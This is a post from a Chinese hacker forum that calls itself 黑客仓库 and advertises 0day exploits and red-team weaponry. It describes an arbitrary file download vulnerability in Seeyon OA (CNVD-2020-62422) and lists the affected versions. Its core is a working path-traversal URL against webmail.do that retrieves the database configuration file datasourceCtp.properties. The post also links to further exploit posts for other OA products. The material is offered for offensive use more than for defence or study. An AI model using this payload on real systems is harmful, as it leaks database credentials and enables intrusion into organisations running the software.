黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

致远OA 任意文件下载（CNVD-2020-62422）

主题发起人 Shacker
开始时间 09 10, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 10, 2024

## 漏洞概述致远OA的webmail.do接口存在任意文件下载漏洞，攻击者可利用该漏洞下载任意文件，获取敏感信息‘；

PHP:

## 影响范围

```http
A6-V5
A8-V5
G6-V5
影响范围极广泛
```

##  POC&EXP

验证POC-下载数据库配置文件

```http
http://xxx.com/seeyon/webmail.do?method=doDownloadAtt&filename=data.txt&filePath=../conf/datasourceCtp.properties
```

批量POC

```http
大宝剑（已同步）
```

致远OA Session-任意文件上传包含EXP

通达OA (蚁剑)通达OA v11.8 后台命令执行漏洞

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC 禅道 OA[CNVD-C-2020-121325] Shacker 09 10, 2024 POC/?Day漏洞数据
	POC 禅道OA[CNVD-C-2020-121325]-文件上传 Shacker 09 10, 2024 POC/?Day漏洞数据
	?day Bsh远程代码执行（CNVD-2019-32204）未授权访问漏洞 Shacker 09 10, 2024 POC/?Day漏洞数据
	致远OA ajax.do任意文件上传（ CNVD-2021-01627） Shacker 09 10, 2024 POC/?Day漏洞数据
	兰陵OA EKP 后台SQL注入漏洞 CNVD-2021-01363 Shacker 09 10, 2024 POC/?Day漏洞数据

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部

黑客仓库

致远OA 任意文件下载（CNVD-2020-62422）

论坛统计

新会员

在线会员

关于我们